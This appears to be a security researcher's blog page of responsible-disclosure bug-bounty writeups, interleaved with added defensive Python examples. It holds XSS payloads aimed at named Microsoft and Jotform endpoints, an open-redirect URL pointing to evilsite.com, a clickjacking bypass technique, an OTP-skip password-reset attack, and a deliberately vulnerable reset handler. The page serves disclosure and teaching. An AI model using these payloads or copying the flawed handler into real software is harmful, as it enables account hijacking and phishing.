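As an added illustration of the "how would you stop these attacks" part of the sample answer above (this is my example, not code from the original post), here is a small credential-stuffing detector run over constructed authentication log lines. The log format, the 60-second window and the five-account threshold are assumptions chosen for the demonstration; the signal it looks for is one source failing against many distinct accounts, which is what distinguishes stuffing from an ordinary user mistyping a password.

```python
"""Detect credential-stuffing patterns in authentication logs.

Added example, not from the original post. The log format is a constructed
one: "<epoch_seconds> <client_ip> <username> <result>" with result "ok" or
"fail". Window and threshold values are illustrative assumptions.
"""
from collections import defaultdict

# Constructed sample log: one source cycling through many accounts (stuffing),
# one legitimate user mistyping a password twice, and a normal login.
SAMPLE_LOG = """\
1000 203.0.113.7 alice fail
1001 203.0.113.7 bob fail
1002 203.0.113.7 carol fail
1003 203.0.113.7 dave fail
1004 203.0.113.7 erin fail
1005 203.0.113.7 frank ok
1010 198.51.100.9 alice fail
1011 198.51.100.9 alice fail
1012 198.51.100.9 alice ok
1020 192.0.2.33 gina ok
"""


def parse_log(text):
    """Parse the constructed log lines into (ts, ip, user, result) tuples."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of failing the whole run
        ts, ip, user, result = parts
        events.append((int(ts), ip, user, result))
    return events


def detect_stuffing(events, window_s=60, min_users=5):
    """Return {ip: distinct_failed_users} for sources that fail against at
    least min_users different accounts inside any window_s-second window.

    A per-account lockout policy never fires here because each account sees
    only one failure; the per-source view is what exposes the pattern.
    """
    failures_by_ip = defaultdict(list)
    for ts, ip, user, result in events:
        if result == "fail":
            failures_by_ip[ip].append((ts, user))

    flagged = {}
    for ip, attempts in failures_by_ip.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # advance the window start until it fits within window_s seconds
            while attempts[end][0] - attempts[start][0] > window_s:
                start += 1
            distinct_users = {user for _, user in attempts[start:end + 1]}
            if len(distinct_users) >= min_users:
                flagged[ip] = max(flagged.get(ip, 0), len(distinct_users))
    return flagged


if __name__ == "__main__":
    for ip, count in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: failed logins against {count} distinct accounts")
```

In an interview answer the output of a detector like this is what you would feed into the mitigation step: per-source rate limiting, a challenge (CAPTCHA or step-up authentication) for flagged sources, and alerting on the affected accounts.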
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#3. It's all about having Cyber Security skills</span></span></h4>
It might sound counter-intuitive, but Cyber Security constitutes less than 50% of the overall interview domains; being good in cyber security alone won't be sufficient to get you through the interview process.<br />
<br />
Some of the other domains you need to know might be:<br />
<ul style="text-align: left;">
<li>Networking Fundamentals - (OSI, DMZ, Firewalls, DNS) </li>
<li>Competitive Programming - (Optimized Solution, Calculating Space & time complexities)</li>
<li>Code Review - (Ability to read someone's code)</li>
<li>System Design - (More details later in the post)</li>
</ul>
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#4. I am not interviewing for a dev role, I don't need to know Competitive Programming</span></span></h4>
While the majority of companies might not ask you to solve Competitive Programming questions, there are still a few which will. For instance, 3 of my interviews (2 screening & 1 onsite) @ Facebook were pure competitive programming interviews. <br />
<br />
The expectation in this interview is that you should be able to solve easy-to-medium level competitive programming questions, find the optimized solution and its space/time complexities, and be able to implement the most basic data structures like Sets, Lists, Hash Maps etc.<br />
<br />
It's very difficult to build these skills overnight, so you should definitely check whether your dream company requires this skill set.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#5. Security design interviews should be easy to clear</span></span></h4>
When I found Security Design in my onsite interview schedule @Amazon I searched online a little and didn't find many resources about this topic, so I assumed that I would be asked about WAF, IDS, Encryption etc., the basic things you need to make a network architecture secure.<br />
<br />
During my interview I was asked to come up with the architecture for a particular type of website. I did it: I made a server, a database and an API gateway, connected all of them together and, as a cherry on top, I even added a WAF. BoOm!! (it's big brain time). I felt the interview was too easy, but I was not even close; I missed the expectations of that interview by a couple of light-years.<br />
<br />
In reality, Security Design interview is a <b>System Design interview</b> with security as a focus area. To get a taste of what a system design interview looks like, <a href="https://www.youtube.com/watch?v=umWABit-wbk" target="_blank">you should look at this video</a>.<br />
<br />
But to summarize, you need to know:<br />
<ul style="text-align: left;">
<li>Data Structures (How would you build an Uber like app? heard about QuadTree Data structure?) </li>
<li>Tradeoffs (Why would you pick a NoSQL DB in comparison to Relational DB?)</li>
<li>Concepts (Consistent Hashing, CAP Theorem etc)</li>
<li>Scaling Strategies (How to vertically & horizontally scale a design, what sharding strategy would you define?) </li>
</ul>
Another interesting type of security design interview is one where you'll be given a half-done design and a predefined set of goals. Your interviewer will ask you to add new things and make the design work in such a way that it meets the predefined goals.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#6. Behavioral interviews are a piece of cake</span></span></h4>
They are not: your behavioral interviews can last anywhere from 40 mins to 1 whole day (at Amazon all onsite tech interviews are 50% tech and 50% behavioral). During these interviews you will be asked about your past experiences, so you should prepare enough examples to last you through 40 mins or 1 day.<br />
<br />
These interviews are also the most important ones; if you fail this then, regardless of how well your technical rounds went, you will still be rejected. The recommended way to answer these questions is to follow the STAR methodology; if you haven't heard about it before, you should definitely <a href="https://theinterviewguys.com/star-method/" target="_blank">check it out.</a><br />
<br />
In a nutshell, behavioral interviews can't be taken for granted and definitely need some prior preparation.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#7. The interviewer is interviewing to find flaws & weaknesses</span></span></h4>
It may come as a surprise, but interviewers at these companies actually want you to perform well in the interviews. With most of these companies you would have a <a href="https://observer.com/2017/03/interview-preparation-tips-salary-dress-code-negotiations/" target="_blank">Prep call</a>, where they will walk you through the interview process & tell you what to expect during the interview. Some companies even go to the extent of buying you an online course so that you can prepare better for the interviews.<br />
<br />
I can't explain this with facts & metrics, but if you change your perspective from "the interviewer is interviewing you to find your flaws" to "the interviewer is interviewing you to succeed" you'll be more comfortable giving the interview; this works like magic and there's no explanation for it.<br />
<br />
Finally, if you have an upcoming interview, all the best :) Or if you're in the process of preparing for interviews, here are some good resources I found: <a href="https://github.com/gracenolan/Notes/blob/master/interview-study-notes-for-security-engineering.md" target="_blank">Security Engineering at Google: My Interview Study Notes</a> and <a href="https://haiderm.com/my-experience-with-google-interview-for-information-security-engineer/" target="_blank">My experience with Google interview for information security engineer.</a><br />
<br />
<br /></div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com2tag:blogger.com,1999:blog-7421436727677135031.post-10213525710421790732017-10-15T10:46:00.000-07:002017-10-15T11:08:57.911-07:00[Writeup] How i bypassed XFrame options protection at Google Books<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Hi There,<br />
<br />
This is a long-delayed writeup; I had reported this vulnerability around March this year, but didn't realize that the bug had been fixed until now.<br />
<br />
Let's get started,<br />
<br />
<b>Abstract:</b><br />
<br />
Google Books has implemented <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options" rel="nofollow" target="_blank">X-Frame-Options</a> header for protection against <a href="https://www.owasp.org/index.php/Clickjacking" rel="nofollow" target="_blank">ClickJacking attack</a>.<br />
I was able to bypass this protection and clickjack Google Books Dashboard.<br />
<b><br /></b>
<b>Background: </b><br />
<br />
So one good evening, when I was checking out some books on Google, I came across this preview page which for some strange reason looked vulnerable to me, and I started testing it out. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-LFAZ0QsUSys/WeNc97BkKCI/AAAAAAAAAE0/L90NaBFSfRMSgY4N_OuokBneKHtfAjI5ACLcBGAs/s1600/book%2Bpreview.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="843" data-original-width="1600" height="336" src="https://4.bp.blogspot.com/-LFAZ0QsUSys/WeNc97BkKCI/AAAAAAAAAE0/L90NaBFSfRMSgY4N_OuokBneKHtfAjI5ACLcBGAs/s640/book%2Bpreview.JPG" width="640" /></a></div>
<br />
While testing the webpage I found that Google allows its books to be embedded into another webpage by using an embed code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-GM_OM71ePgY/WeNgZvqTGYI/AAAAAAAAAFA/pItqSEv2H8o2jJojKkhJzxaB9WKFjGGVwCLcBGAs/s1600/embed.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="614" height="156" src="https://3.bp.blogspot.com/-GM_OM71ePgY/WeNgZvqTGYI/AAAAAAAAAFA/pItqSEv2H8o2jJojKkhJzxaB9WKFjGGVwCLcBGAs/s400/embed.JPG" width="400" /></a></div>
<br />
This is an example embed code: <br />
<br />
<blockquote class="tr_bq">
<iframe frameborder="0" scrolling="no" style="border:0px" src="https://books.google.co.in/books?id=YJKbVzeabJYC&lpg=PP1&dq=web%20application%20hackers&pg=PP1&output=embed" width=500 height=500></iframe></blockquote>
By reading the code one can easily tell that the X-Frame-Options protection must be turned off for the iframe source URL in order to make it framable on another webpage.<br />
<br />
The HTTP response headers of the embed URL are:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CI_Xjs-W79I/WeNjP59HY1I/AAAAAAAAAFQ/6JyDdmssVOYsnqBpj8LbxzbbjKZ-62_lQCLcBGAs/s1600/nope.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="354" height="270" src="https://4.bp.blogspot.com/-CI_Xjs-W79I/WeNjP59HY1I/AAAAAAAAAFQ/6JyDdmssVOYsnqBpj8LbxzbbjKZ-62_lQCLcBGAs/s320/nope.JPG" width="320" /></a></div>
<br />
By comparing the framable URL with the original Google eBook URL, I found an interesting parameter: <b>output=embed</b><br />
<br />
<blockquote class="tr_bq">
<b>Original webpage URL </b><br />
https://books.google.co.in/books?id=YJKbVzeabJYC&printsec=frontcover&dq=web+application+hackers&hl=en&sa=X&redir_esc=y#v=onepage&q&f=false</blockquote>
<blockquote class="tr_bq">
<b>Framable</b> <b>URL</b><br />
https://books.google.co.in/books?id=YJKbVzeabJYC&lpg=PP1&dq=web%20application%20hackers&pg=PP1&<u><b>output=embed</b></u></blockquote>
<br />
Using this parameter Google was removing X-Frame-Options and making a book framable.<br />
<br />
Now the question is: will this parameter remove X-Frame-Options from any other webpage and make it framable?<br />
<br />
Answer: Yes<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-sSd1aj4RLVM/WeN4dlmi-OI/AAAAAAAAAF4/wJxvtzgzkxYCVJwcOnZw5d4ALObJHXHlQCLcBGAs/s1600/new%2B49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="792" height="618" src="https://4.bp.blogspot.com/-sSd1aj4RLVM/WeN4dlmi-OI/AAAAAAAAAF4/wJxvtzgzkxYCVJwcOnZw5d4ALObJHXHlQCLcBGAs/s640/new%2B49.png" width="640" /></a></div>
<br />
<br />
<blockquote class="tr_bq">
<b>HTTP Response of Google books Dashboard</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-3r55bCZkrZc/WeN6RTTRYPI/AAAAAAAAAGE/ZaQvQ1LRpd0k5YHB7KcZjGtCkI3IUUXqACLcBGAs/s1600/yes1%2Bxframe%2B-%2BCopy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="261" data-original-width="976" height="171" src="https://1.bp.blogspot.com/-3r55bCZkrZc/WeN6RTTRYPI/AAAAAAAAAGE/ZaQvQ1LRpd0k5YHB7KcZjGtCkI3IUUXqACLcBGAs/s640/yes1%2Bxframe%2B-%2BCopy.JPG" width="640" /></a></div>
</blockquote>
<br />
<blockquote class="tr_bq">
<b>HTTP Response of Google books Dashboard with output=embed parameter</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-qn3kWK51n60/WeN6bY0BZfI/AAAAAAAAAGI/Twa_5VtiOowxR-_0KvzcgZfdAJ3FTgT-QCLcBGAs/s1600/no1%2Bxframe%2B-%2BCopy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="981" height="158" src="https://4.bp.blogspot.com/-qn3kWK51n60/WeN6bY0BZfI/AAAAAAAAAGI/Twa_5VtiOowxR-_0KvzcgZfdAJ3FTgT-QCLcBGAs/s640/no1%2Bxframe%2B-%2BCopy.JPG" width="640" /></a></div>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b>Impact:</b> Just by making 2 clicks on the Proof-of-Concept webpage, all books from your bookshelf could be deleted.<br />
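To make the root cause concrete, here is an added example (my own illustration, not Google's code, whose actual implementation the writeup does not show) of the header logic the finding implies, in generic form. The first function drops X-Frame-Options whenever output=embed appears in the query string, regardless of path, which is exactly what let the dashboard be framed. The hardened version relaxes framing only on an explicit allow-list of embeddable paths and also emits a CSP frame-ancestors directive, which modern browsers prefer over X-Frame-Options. The hostname, the paths and the header values are assumptions.

```python
"""Framing decision for an embed feature: the parameter-only pattern the
writeup describes, beside a path-allow-listed version.

Added example, not the code of the service in the writeup. The host
books.example, the /books and /dashboard paths and the header values are
assumptions made for the demonstration.
"""
from urllib.parse import parse_qs, urlsplit

# Assumed: only the public book viewer is meant to be embeddable.
EMBEDDABLE_PATHS = frozenset({"/books"})


def _wants_embed(url):
    """True when the query string carries output=embed."""
    return parse_qs(urlsplit(url).query).get("output") == ["embed"]


def vulnerable_headers(url):
    """Flawed pattern: the framing decision keys off the query parameter alone,
    so *any* path on the site becomes framable once output=embed is appended."""
    headers = {"Content-Type": "text/html"}
    if not _wants_embed(url):
        headers["X-Frame-Options"] = "SAMEORIGIN"  # value assumed
    return headers


def hardened_headers(url):
    """Framing is relaxed only when the path is on the allow-list AND embed mode
    is requested. Everything else denies framing via both the legacy header and
    CSP frame-ancestors, so a stray parameter on an authenticated page changes
    nothing."""
    path = urlsplit(url).path
    headers = {"Content-Type": "text/html"}
    if _wants_embed(url) and path in EMBEDDABLE_PATHS:
        headers["Content-Security-Policy"] = "frame-ancestors *"
    else:
        headers["X-Frame-Options"] = "DENY"
        headers["Content-Security-Policy"] = "frame-ancestors 'none'"
    return headers


def is_framable(headers):
    """Approximation of what a browser decides from these two headers."""
    csp = headers.get("Content-Security-Policy", "")
    if "frame-ancestors" in csp:
        return "'none'" not in csp
    return "X-Frame-Options" not in headers


if __name__ == "__main__":
    for url in ("https://books.example/books?id=abc&output=embed",
                "https://books.example/dashboard?output=embed"):
        print(url, "vulnerable:", is_framable(vulnerable_headers(url)),
              "hardened:", is_framable(hardened_headers(url)))
```

The general lesson is that a response-wide security header should never be toggled by a request parameter alone; the decision belongs to the endpoint, and the safe default applies to everything not explicitly opted in.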
<br />
<b>Reward: </b>$500<br />
<br />
Thanks for Reading :) </div>
</div>
<div>
</div>
</div>
</div>
</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com3tag:blogger.com,1999:blog-7421436727677135031.post-60651623940856670422017-07-29T10:30:00.000-07:002017-10-15T10:33:31.585-07:00[Writeup] How i prevented a bank from getting robbed<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://images.vice.com/motherboard/content-images/article/33643/1463424233283353.jpg?crop=0.888888888888889xw:1xh;center,center&resize=1050:*" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://images.vice.com/motherboard/content-images/article/33643/1463424233283353.jpg?crop=0.888888888888889xw:1xh;center,center&resize=1050:*" width="640" /></a></div>
<div>
</div>
<div>
</div>
<div>
<br />
This story is about a loophole in an online banking website which could have allowed an attacker to steal funds from any customer account. After discovering this issue I immediately got in touch with the bank's security team and coordinated with them until a patch for this loophole was released. In this writeup I can't share the exact technical details of how I exploited the issue on the target website, but I can give you a generalized idea of what went wrong and how it could have been exploited. <br />
<br />
<b>Abstract: </b><br />
There was a bug in the forgot password module of a netbanking website, by exploiting which an attacker could have updated any customer's netbanking account password to a value of his choosing.<br />
<div>
<br /></div>
</div>
<div>
To understand the exploit, we first need to understand how password recovery works on the target bank's website.<br />
<br /></div>
<div>
Here is the normal flow of the password recovery process, which can be initiated by visiting the forgot password page:<br />
</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-0OOWMoe5mxc/WNZap2iL-RI/AAAAAAAAAEY/95FlrFdYg1AlWLJ9o8oIR7NjNvDwxLCfgCLcB/s1600/Picture1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://4.bp.blogspot.com/-0OOWMoe5mxc/WNZap2iL-RI/AAAAAAAAAEY/95FlrFdYg1AlWLJ9o8oIR7NjNvDwxLCfgCLcB/s640/Picture1.png" width="640" /></a></div>
<br />
To recover a forgotten password on the netbanking website a customer has to follow this process:<br />
<br />
<b>Step 1: </b>Identify account using customer id. <br />
<b>Step 2: </b>Submit an OTP (One Time Password) which will be sent via SMS & Email.<br />
<b>Step 3:</b> Set a new password.<br />
<br />
After following this process the customer's password will be updated.<br />
<br />
During my research, I found that the webpage at "Step 3" was not validating whether the customer had completed "Step 2" (OTP Verification).<br />
<br />
</div>
<div>
<b>The Exploit:</b></div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-i8AMP13n04k/WNZa73LALkI/AAAAAAAAAEc/-FSo8Tgt6VIeA-mb0-rrARhgnOccq4pgwCLcB/s1600/Picture2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://1.bp.blogspot.com/-i8AMP13n04k/WNZa73LALkI/AAAAAAAAAEc/-FSo8Tgt6VIeA-mb0-rrARhgnOccq4pgwCLcB/s640/Picture2.png" width="640" /></a></div>
</div>
To exploit this issue an attacker has to complete "Step 1" -> generate a Session ID -> submit this Session ID to the "Step 3" endpoint along with the new password that is to be set for the account.<br />
<br />
After making the POST request the customer's netbanking password will be updated. Since the customer IDs on the netbanking website were numerical, an attacker could have written a script that would reset every netbanking account's password and transfer funds out of it. <br />
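The missing check is easy to show in code. The following is an added example (my own, not the bank's implementation, whose details the author deliberately withholds) of the three-step flow modelled as a per-session state machine. The step 3 handler labelled vulnerable trusts any session that completed step 1, which is the flaw described above; the hardened one refuses unless that same session has passed OTP verification, binds the reset to the account identified in step 1, and invalidates the session afterwards so it cannot be replayed. The function names, the in-memory stores and the OTP handling are assumptions.

```python
"""Password-recovery flow as a server-side state machine.

Added example, not the bank's code. Stores are in-memory dictionaries and the
password hash is a placeholder; a real system would use a slow KDF and a
database. Customer id 10001 and its password are constructed sample data.
"""
import hashlib
import hmac
import secrets

SESSIONS = {}   # session_id -> {"customer_id": str, "otp": str, "otp_verified": bool}
PASSWORDS = {}  # customer_id -> password hash


def _hash(password):
    # Placeholder hash for the demonstration; use argon2/bcrypt/scrypt in practice.
    return hashlib.sha256(password.encode()).hexdigest()


def step1_identify(customer_id):
    """Step 1: start a reset session for the account and generate the OTP.
    The OTP is returned here only so the example can simulate SMS/email
    delivery; a real server sends it out of band and never returns it."""
    session_id = secrets.token_urlsafe(16)
    otp = f"{secrets.randbelow(10**6):06d}"
    SESSIONS[session_id] = {"customer_id": customer_id, "otp": otp, "otp_verified": False}
    return session_id, otp


def step2_verify_otp(session_id, submitted_otp):
    """Step 2: mark the session verified only on a constant-time OTP match."""
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    if hmac.compare_digest(session["otp"], submitted_otp):
        session["otp_verified"] = True
        return True
    return False


def step3_set_password_vulnerable(session_id, new_password):
    """Mirrors the flaw in the writeup: any session created in step 1 is
    accepted, so step 2 can simply be skipped."""
    session = SESSIONS.get(session_id)
    if session is None:
        return False
    PASSWORDS[session["customer_id"]] = _hash(new_password)
    return True


def step3_set_password_hardened(session_id, new_password):
    """Server-side enforcement: the OTP step must have succeeded for this very
    session, and the session is consumed so the reset is single-use."""
    session = SESSIONS.get(session_id)
    if session is None or not session["otp_verified"]:
        return False
    PASSWORDS[session["customer_id"]] = _hash(new_password)
    del SESSIONS[session_id]
    return True


def check_login(customer_id, password):
    return PASSWORDS.get(customer_id) == _hash(password)


def demo():
    """Run the constructed scenario against both handlers and report outcomes."""
    SESSIONS.clear()
    PASSWORDS.clear()
    PASSWORDS["10001"] = _hash("original-secret")
    results = {}

    # Attacker path against the vulnerable handler: step 1, then straight to step 3.
    session_id, _ = step1_identify("10001")
    results["vulnerable_without_otp"] = step3_set_password_vulnerable(session_id, "attacker-pw")

    # Same sequence against the hardened handler, then the legitimate sequence.
    PASSWORDS["10001"] = _hash("original-secret")
    session_id, otp = step1_identify("10001")
    results["hardened_without_otp"] = step3_set_password_hardened(session_id, "new-pw")
    results["otp_accepted"] = step2_verify_otp(session_id, otp)
    results["hardened_with_otp"] = step3_set_password_hardened(session_id, "new-pw")
    results["login_with_new_pw"] = check_login("10001", "new-pw")
    results["session_reusable"] = step3_set_password_hardened(session_id, "again")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The point that generalizes beyond this bank is that each step of a multi-step flow must re-check, on the server, the state recorded by the previous step; a session id proves only that step 1 happened, never that the user passed step 2.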
<br />
<blockquote class="tr_bq">
At the end of the day this incident was a good test of my hacker ethics and taught me lessons which I will carry with me throughout my life. </blockquote>
<br />
Thanks for reading & hack for good :)</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com2tag:blogger.com,1999:blog-7421436727677135031.post-61961839439607574052017-02-20T00:28:00.001-08:002017-03-25T03:27:40.895-07:00[Vulnerability Report] Persistent XSS at Jotform<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Q-TI4Q9SL6k/WNZF9xtSwfI/AAAAAAAAADw/Bd7t5vo93WcI5UNCPDeS1MR4ym8gvfBWwCLcB/s1600/jotform.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://4.bp.blogspot.com/-Q-TI4Q9SL6k/WNZF9xtSwfI/AAAAAAAAADw/Bd7t5vo93WcI5UNCPDeS1MR4ym8gvfBWwCLcB/s400/jotform.jpg" width="400" /></a></div>
Persistent XSS @ Developers section<br />
<br />
<b>Vulnerable Service: </b>https://developers.jotform.com<br />
<br />
<b>Description: </b>The service mentioned above is vulnerable to Persistent XSS, due to which an attacker is able to steal user cookies, which may lead to account hijacking.<br />
<br />
<b>Demo XSS thread:</b><br />
<i>https://developers.jotform.com/forum/post/<Removed></i><br />
- Click on "For Testing Purposes" to see the alert message.<br />
<br />
<b>Payload:</b> javascript:alert('I_Am_Vulnerable_To_XSS');<br />
<br />
<b>Steps of Reproduction:</b><br />
- Create a new thread & in the thread editor click the "Add hyperlink" button.<br />
- Now, instead of a URL, paste the payload there.<br />
- "http://" will be automatically prepended to the payload; you need to remove that.<br />
<br />
<b>Proof of Concept:</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-wlqbN-CAELI/WKqzIfypt5I/AAAAAAAAABU/M8eWh8DEo5UM9MC-kXc4iokgVKbfKK8YgCLcB/s1600/jotform%2BPersistent%2BXSS.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://2.bp.blogspot.com/-wlqbN-CAELI/WKqzIfypt5I/AAAAAAAAABU/M8eWh8DEo5UM9MC-kXc4iokgVKbfKK8YgCLcB/s640/jotform%2BPersistent%2BXSS.JPG" width="640" /></a></div>
<b><br /></b> <b>Bounty:</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Mi_pJiesGRM/WKq0GuestdI/AAAAAAAAABc/kVEEPvONPVgaPa0CR17tXOEJOlbNMZJjgCLcB/s1600/Screenshot_2017-02-08-10-57-13-994_com.google.android.gm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://4.bp.blogspot.com/-Mi_pJiesGRM/WKq0GuestdI/AAAAAAAAABc/kVEEPvONPVgaPa0CR17tXOEJOlbNMZJjgCLcB/s400/Screenshot_2017-02-08-10-57-13-994_com.google.android.gm.png" width="225" /></a></div>
<b><br /></b></div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0tag:blogger.com,1999:blog-7421436727677135031.post-68917366580986864052016-12-23T04:27:00.001-08:002017-03-25T03:28:41.533-07:00[Vulnerability Report] Non-persistent XSS at Microsoft<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9tFKiUnHI0Q/WNZGUhwsceI/AAAAAAAAAD0/WKuySZ-60PgwxSGV7PjAl4AizHOGLiayQCLcB/s1600/Microsoft_logo_%25282012%2529.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://1.bp.blogspot.com/-9tFKiUnHI0Q/WNZGUhwsceI/AAAAAAAAAD0/WKuySZ-60PgwxSGV7PjAl4AizHOGLiayQCLcB/s640/Microsoft_logo_%25282012%2529.svg.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<b></b></div>
<b> </b></div>
<div>
</div>
<div>
I had found a reflected XSS issue at Microsoft; below is the report.</div>
<div>
</div>
<div>
<br />
<span style="font-family: "tahoma" , "verdana" , "arial"; font-size: x-small;">------------------- <span style="font-family: "tahoma" , "verdana" , "arial";">Email starts here</span> -------------------</span></div>
<div>
</div>
<div>
<b>Vulnerability Type:</b> Non Persistent XSS</div>
<div>
</div>
<div>
<b>Abstract: </b>The affected URL is vulnerable to Non-persistent XSS, due to which an attacker is able to take over the Microsoft account of a logged-in user.</div>
<div>
</div>
<div>
<b>Affected Url:</b> <i>https://www.microsoft.com/en-us/research/search/?q=<script>;prompt()<script></i></div>
<div>
</div>
<div>
<b>Payload:<i> </i></b><i><script>;prompt()</script></i></div>
<div>
</div>
<div>
<b>Vulnerability Impact Scenario: </b>With Non-Persistent Cross Site Scripting (XSS) an attacker can create a custom URL with cookie-stealing code, on visiting which a user's cookie can be stolen and his account hijacked.</div>
<div>
</div>
<div>
<b>Vulnerability Reproduction Steps(POC):</b><br />
<br />
1. Visit the URL <i>"https://www.microsoft.com/en-us/research/search/?q="</i><br />
2. With the parameter<i> "q="</i> we can inject our payload.</div>
<br />
<div>
<b>Brief description of the issue:</b></div>
<div>
</div>
This vulnerability is caused by validation being present only on the search textbox on the webpage; no validation is present if we provide the same malicious HTML payload directly through the URL.<br />
<br />
<b>Proof of Concept:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5aA8OLJhOr0/WKq1WLd4BFI/AAAAAAAAABw/s1-9tHhmE4YX2A0M815zxeirCdcwlNA7gCLcB/s1600/Microsoft%2BXSS.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://4.bp.blogspot.com/-5aA8OLJhOr0/WKq1WLd4BFI/AAAAAAAAABw/s1-9tHhmE4YX2A0M815zxeirCdcwlNA7gCLcB/s640/Microsoft%2BXSS.JPG" width="640" /></a></div>
<br />
<br />
<b>Hall Of Fame:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-ELgL5gxlpA8/WKq0j7Dd8pI/AAAAAAAAABk/srDwx3hqjLMS5u5slMkyitWvq1cel_KLwCLcB/s1600/Microsoft%2BSeptember.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-ELgL5gxlpA8/WKq0j7Dd8pI/AAAAAAAAABk/srDwx3hqjLMS5u5slMkyitWvq1cel_KLwCLcB/s1600/Microsoft%2BSeptember.JPG" /></a></div>
<br /></div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0tag:blogger.com,1999:blog-7421436727677135031.post-34316724957606182192016-12-23T04:22:00.000-08:002016-12-23T04:22:43.951-08:00[Vulnerability Report] Open Redirect on multiple subdomains of Intel<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://logos-download.com/wp-content/uploads/2016/02/Intel_logo_png_transparent_huge.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://logos-download.com/wp-content/uploads/2016/02/Intel_logo_png_transparent_huge.png" height="262" width="400" /></a></div>
<div>
<strong><span style="font-family: Tahoma, Verdana, Arial; font-size: x-small;">------------------- Original Message -------------------</span> </strong></div>
<div>
<strong> </strong></div>
<div>
<strong>Vulnerability Type:</strong> Open Redirect ( <em>https://www.owasp.org/index.php/Open_redirect </em>)</div>
<div>
</div>
<div>
<strong>Vulnerable URL:</strong></div>
<div>
<em>https://communities.intel.com/terms-and-conditions!input.jspa?url=http://evilsite.com</em></div>
<div>
<em><em>https://<private>.intel.com/external-link.jspa?url=http://evilsite.com</em> </em></div>
<div>
</div>
<div>
<strong>Summary:</strong> An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it.</div>
<div>
</div>
<div>
